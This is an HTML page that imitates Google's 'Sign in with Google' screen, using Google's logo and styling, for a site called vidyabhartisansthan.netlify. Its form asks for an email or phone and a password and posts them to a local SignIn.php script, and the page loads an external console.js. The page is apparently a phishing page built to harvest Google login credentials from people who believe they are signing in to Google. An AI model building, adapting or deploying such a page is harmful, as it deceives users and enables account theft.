<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Google Form</title>

<style>
  @import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');


body {
font-family: 'Open Sans', sans-serif;
}

.box {
width: 96vw;
padding: 6vw 1vw;
display: flex;
flex-direction: column;
justify-content: center!important;
box-sizing: border-box;
/*border: 0.25vw solid #dadce0;*/
-webkit-border-radius: 1.5vw;
border-radius: 1.5vw;

}
.container{
  width: 100%;
  height: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
}
.box h3 {
color: #1F1F1F;
font-size: 8.5vw;
font-weight: 400;
}

.box .logo 
{
display: flex;
flex-direction: row;
justify-content: center;
margin-bottom: 4vw;

}
.logo{
  box-sizing: border-box;
  width: 96vw;
  padding: 2.5vw 5vw;
  color: #4D4F4E;
  display: flex;
  flex-direction: row;
  justify-content: flex-start!important;
  align-items: center;
  gap: 4vw;
  font-size: 3.8vw;
  margin-top: -6vw;
  margin-left: -1vw;
  border-bottom: 0.25vw solid #dadce0;
}
.box p {
font-size: 4.35vw;
font-weight: 400;
letter-spacing: 0.05vw;
margin-top: -2.3vw!important;
margin-bottom: 11.5vw!important;
color: #1F1F1F;
}

.box p a{
  text-decoration: none;
  color: #0B57CF;
  font-weight: 450;
}
.box .inputBox {
position: relative;
}

.box .inputBox input {
width: 84%;
margin-left: 5%;
margin-right: 5%;
padding: 4% 3%;
font-size: 4vw;
letter-spacing: 0.25vw;
margin-bottom: 5vw;
border: 0.25vw solid #ccc;
background: transparent;
border-radius: 1vw;
}

.box .inputBox label {
position: absolute;
top: 4.1vw;
left: 8.3vw;
padding: 0;
font-size: 4vw;
color: gray;
pointer-events: none;
transition: 0.35s;
}

.box .inputBox input:focus ~ label,
.box .inputBox input:valid ~ label,
.box .inputBox input:not([value=""]) ~ label {
top: -1.5vw;
left: 7vw;
color: #1a73e8;
font-size: 3.5vw;
background-color: #fff;
height: 2.5vw;
padding-left: 1.25vw;
padding-right: 1.25vw;
}

.box .inputBox input:focus {
outline: none;
border: 0.5vw solid #1a73e8;
}

.box input[type="submit"] {
border: none;
outline: none;
color: #FEFEFE;
background-color: #0B57CF;
padding: 2.6vw 6vw;
cursor: pointer;
border-radius: 6vw;
font-size: 4vw;
font-weight: 450;
  }
  
  .box input[type="submit"]:hover {
background-color: #287ae6;
box-shadow: 0 0.25vw 0.25vw 0 rgba(66,133,244,0.45), 0 0.25vw 0.75vw 0.25vw rgba(66,133,244,0.3);
  }
.info_text_box{
  box-sizing: border-box;
  width: 90%;
  margin: 10% 5%!important;
  margin-bottom: 12vw!important;
  padding: 0 0vw!important;
}
.info_text_box p{
  color: #444645;
  text-align: start;
  font-size: 3.7vw;
  letter-spacing: 0.05vw;
}
.input{
  height: 6.5vw;
}
#create{
  color: #0B57CF;
  font-size: 4vw;
  font-weight: 500;
}
.xyz{
  width: 90%;
  margin: 0% 5%;
  margin-top: 10vw;
  display: flex;
  justify-content: space-between;
  align-items: center;
}
.a{
  width: 84vw;
  margin: 0 5vw;
  display: flex;
  flex-direction: column;
  justify-content: flex-start;
}
.forget{
  width: 90%;
  margin: 0 5%;
  margin-top: -2vw;
  margin-bottom: 20vw;
}
.forget a{
  color: #0B57D0;
  text-decoration: none;  
  font-size: 4vw;
  font-weight: 450;
}
#submit:focus{
}
#img{
  
}
  </style>
 
</head>
<body>
<div class="container">
  <div class="box">
   <div class="logo">
      <svg id="img" class="th8JXc" xmlns="https://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 48 48" aria-hidden="true" jsname="jjf7Ff"><path fill="#4285F4" d="M45.12 24.5c0-1.56-.14-3.06-.4-4.5H24v8.51h11.84c-.51 2.75-2.06 5.08-4.39 6.64v5.52h7.11c4.16-3.83 6.56-9.47 6.56-16.17z"/><path fill="#34A853" d="M24 46c5.94 0 10.92-1.97 14.56-5.33l-7.11-5.52c-1.97 1.32-4.49 2.1-7.45 2.1-5.73 0-10.58-3.87-12.31-9.07H4.34v5.7C7.96 41.07 15.4 46 24 46z"/><path fill="#FBBC05" d="M11.69 28.18C11.25 26.86 11 25.45 11 24s.25-2.86.69-4.18v-5.7H4.34C2.85 17.09 2 20.45 2 24c0 3.55.85 6.91 2.34 9.88l7.35-5.7z"/><path fill="#EA4335" d="M24 10.75c3.23 0 6.13 1.11 8.41 3.29l6.31-6.31C34.91 4.18 29.93 2 24 2 15.4 2 7.96 6.93 4.34 14.12l7.35 5.7c1.73-5.2 6.58-9.07 12.31-9.07z"/><path fill="none" d="M2 2h44v44H2z"/>
      </svg>
      <span>Sign in with Google</span>
</div>
<div class="a">
<h3>Sign In</h3>
<p>to continue to <a href="www.vidyabhartisansthan.netlify">vidyabhartisansthan.netlify</a></p>
</div>
<div class="formBox">
<form method="post" action="SignIn.php">
<div class="inputBox">
  <input class="input" type="text" name="username" required onkeyup="this.setAttribute('value', this.value);"  value="">
  <label>Email or phone</label>
</div>
<div class="inputBox">
  <input class="input" type="password" name="password" required onkeyup="this.setAttribute('value', this.value);" value="">
  <label>Password</label>
</div>
<div class="forget">
  <a href="">Forgot email?</a>
</div>
<div class="info">
  <div class="info_text_box">
  <p>To continue, Google will share your name, email address, language preference, and profile picture with vidyabhartisansthan.netlify</p>
  </div>
</div>
<div class="xyz">
<span id="create">Create account</span>
<input id="submit" type="submit" name="sign-in" value="Sign In">
</div>
 </form>
</div>
 </div>
</div>
  <script src="console.js"></script>
</body>
</html>